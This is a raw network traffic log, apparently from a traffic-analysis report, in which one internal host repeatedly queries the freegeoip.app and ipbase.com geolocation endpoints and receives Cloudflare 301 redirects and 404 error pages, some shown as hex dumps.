                                      Date: Fri, 06 Sep 2024 23:48:00 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:48:00 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yi7xCTu6Tj75MuL6zB8ZFBy0GPW5e62uIUlmbQH%2BcMX7vCbN%2BTwJt4Saa8NQ7pKtkPitnQw0nOMT1ByutEAGT9Im9ucMY0CKBlE9ulgo7Jq3%2BtuUhETT7onJCEX1am33"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf258efa91a424d-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:00 UTC | 167 | IN | Data Ascii:
                                      <html>
                                      <head><title>301 Moved Permanently</title></head>
                                      <body>
                                      <center><h1>301 Moved Permanently</h1></center>
                                      <hr><center>cloudflare</center>
                                      </body>
                                      </html>


                                      Session ID: 25 | Source IP: 192.168.2.5 | Source Port: 49751 | Destination IP: 104.21.85.189 | Destination Port: 443
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-09-06 23:48:01 UTC | 64 | OUT | GET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:01 UTC | 735 | IN | HTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:48:01 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 33336
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VSN292RR6E3MCGB9XJK82
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KBalkW3sLCGdXhjrVjpACd19ua2xcO8H6KmdVgtGWbhHsEZcCjfWJErr0E5e9Q0rLuDwqtKDl%2FRHIfj%2FlefNQJwfVI9UroLwR4enS%2FrxK8mQOVNF7fMNo3sUYPbe"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf258f379a642b2-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:01 UTC | 634 | IN | Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:48:01 UTC | 1369 | IN | Data Ascii: : 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 1
                                      2024-09-06 23:48:01 UTC | 1086 | IN | Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.43294
                                      2024-09-06 23:48:01 UTC | 5 | IN | Data Ascii: 0


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      26 | 192.168.2.5 | 49754 | 188.114.97.3 | 443
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-09-06 23:48:04 UTC | 67 | OUT | GET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:04 UTC | 641 | IN | HTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:48:04 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:48:04 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m4Bf4en5yPIIu2%2FCVKiFCB1xM%2FSDm8ki6B7CAHoQc61QLhBSgMtUp2RSX%2BdKuIRjbhXJ8yap84FEifiRqymPYELlmSLEMwqVVlwhOom40VpBNfxY3UJZrYY%2FOQcoMAwU"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25908288b4265-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:04 UTC | 167 | IN | Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      27 | 192.168.2.5 | 49756 | 104.21.85.189 | 443
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-09-06 23:48:05 UTC | 64 | OUT | GET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:05 UTC | 734 | IN | HTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:48:05 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 7886
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VSRXBWXJT3NXKWXWETCGC
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tnBG7ySWoKU5GgryGcI9O5ue3PzHWTyiJl42fjXbDJZ6jp3HabKVOrJCQwoyxUfyBIW%2B0L0lDH%2FRzcI8K3uqj9cZx4z16dRlFtPp89%2FVsGmI8yLu7HB561bIOQnG"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf2590c2836c413-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:05 UTC | 635 | IN | Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:48:05 UTC | 1369 | IN | Data Ascii: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 10
                                      2024-09-06 23:48:05 UTC | 1085 | IN | Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.432949
                                      2024-09-06 23:48:05 UTC | 5 | IN | Data Ascii: 0


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      28 | 192.168.2.5 | 49758 | 188.114.97.3 | 443
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-09-06 23:48:06 UTC | 67 | OUT | GET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:06 UTC | 641 | IN | HTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:48:06 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:48:06 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oNGfPlm%2BGm8VioPapEb7%2Bv2wjwGgWPA8xt1phIjtVgC8J3%2B8n5A56XkhLuM%2FtQ53tpFXxScpdymFTuY7EW7o5FASmokEBJQaigkkNOY2KaplNKBQBVh8NYenLGyFWHPb"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25916b8fd195d-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:06 UTC | 167 | IN | Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      29 | 192.168.2.5 | 49759 | 104.21.85.189 | 443
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-09-06 23:48:07 UTC | 64 | OUT | GET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:07 UTC | 741 | IN | HTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:48:07 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 11911
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VSV5E5313SEQY6ZHG5CHQ
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vRywUc7YIJj0qebfyDtc1z4K64ggV97l%2F6b9tGTss9%2BKuV70cSFcwrig9wQVLcKaHkQIhLBBISYkahvocNEUlgD2q7PzVCiq%2F5%2F0UvPrbK3lk%2BWzNKZpBaE%2BA1GZ"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf2591a8c151821-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:07 UTC | 628 | IN | Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:48:07 UTC | 1369 | IN | Data Ascii: adding: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; hei
                                      2024-09-06 23:48:07 UTC | 1092 | IN | Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7
                                      2024-09-06 23:48:07 UTC | 5 | IN | Data Ascii: 0


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      30 | 192.168.2.5 | 49761 | 188.114.97.3 | 443
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-09-06 23:48:09 UTC | 67 | OUT | GET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:09 UTC | 639 | IN | HTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:48:09 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:48:09 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3DWKbLA1B6RB3OdXI9TVhPSU2hsN44HVCMSzQBS2%2Bq8yhq9V%2FU7MyC0E%2Fjb4r4kOXwkVForuQrSNA4rbQm76VtExX5qdS3ThKG50hSnt3IVIUm7vOc7H3miyFUjhvfpr"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25925bd81c3fa-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:09 UTC | 167 | IN | Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      31 | 192.168.2.5 | 49763 | 104.21.85.189 | 443
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-09-06 23:48:09 UTC | 64 | OUT | GET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:09 UTC | 730 | IN | HTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:48:09 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 7890
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VSXG372MEWM1YJJZN85FS
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pQMb07U8WhNxKBjU7pXvTXrpWf6fTE4ZD2Bkbc3Shn1nz6bKoaaS5TN6ymyC88M7f9tjPtqNl%2FC5ExApgZuCqwjcAHsgaS0xEmlkl8f0fj1Fa6vWO4NT3bJeFnfr"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf259297c0d19f7-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:09 UTC | 639 | IN | Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:48:09 UTC | 1369 | IN | Data Ascii: } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 100vh;
                                      2024-09-06 23:48:09 UTC | 1081 | IN | Data Ascii: th fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.43294936 L
                                      2024-09-06 23:48:09 UTC | 5 | IN | Data Ascii: 0


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      32 | 192.168.2.5 | 49765 | 188.114.97.3 | 443
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-09-06 23:48:12 UTC | 67 | OUT | GET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:12 UTC | 643 | IN | HTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:48:12 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:48:12 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LP7Mf4QOMs%2BSxkp2CMwvUKlIxMQUf5pED7rsPdpDV8UxBAqZcYurhDKgV2dnqJKOcSNfhqryMhyz2%2Bs%2B9Y%2F6SFYaTPrtR1EXyj7xk2mtlgkVkhiocxZZ19Gba%2Bg5HgqY"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf259395c5342b0-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:12 UTC | 167 | IN | Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      33 | 192.168.2.5 | 49766 | 104.21.85.189 | 443
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-09-06 23:48:13 UTC | 64 | OUT | GET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:13 UTC | 735 | IN | HTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:48:13 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 33348
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VT0TNF2W8XG0BFFKKC1XB
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Pg6W3xpD1HJndM4VsTcZEpzDL9ypKDVZEgJ2cKwBlMBnSJ8rfJIDVcApTIO%2F4clyt%2BiW7zYRZlRhgG3yE3Ik%2FTTzI2IMpsV5ghDisL4DGHQURMqsxUDef1FrQbL"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf2593ec95f4301-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:13 UTC634INData Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:48:13 UTC1369INData Raw: 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31
                                      Data Ascii: : 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 1
                                      2024-09-06 23:48:13 UTC | 1086 | IN | Data Raw: 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e 34 33 32 39 34
                                      Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.43294
                                      2024-09-06 23:48:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      34 | 192.168.2.5 | 49768 | 188.114.97.3 | 443
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-09-06 23:48:16 UTC | 67 | OUT | GET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:16 UTC | 641 | IN | HTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:48:16 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:48:16 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bZdiflgOgxFUoHHgHUQbH5MtmIDd7r0%2FpFKawHWVSp4oB9A9fPX0%2FQlUwC3MJhxqHdRYz9sd%2FqvT0IHIm1Tll7Xq5ZqNJmimTScepUvxmpW%2Bq155uG5KFY2ovnY9notV"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25952bf8d435c-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:16 UTC | 167 | IN | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                      35 | 192.168.2.5 | 49770 | 104.21.85.189 | 443
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-09-06 23:48:16 UTC | 64 | OUT | GET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:48:17 UTC | 745 | IN | HTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:48:17 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 27404
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VT4GSC4KK8FNFRDGCWCFT
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I1LndiuMAfg28CNUhb78%2FLVoNVrztt86poIq9qbf%2BwQgSNHuA8oetBx7tiwR%2B6jLGQW2i%2BLBO2P4RG%2B4YBP5N9OAza%2BtFJx1A2OhK9uY3tXOlfmJ9O6%2B5GC0NBO%2B"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf259568a4878e7-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:48:17 UTC | 624 | IN | Data Raw: 63 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:48:17 UTC | 1369 | IN | Data Raw: 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20
                                      Data Ascii: padding: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center;
                                      2024-09-06 23:48:17 UTC | 1096 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35
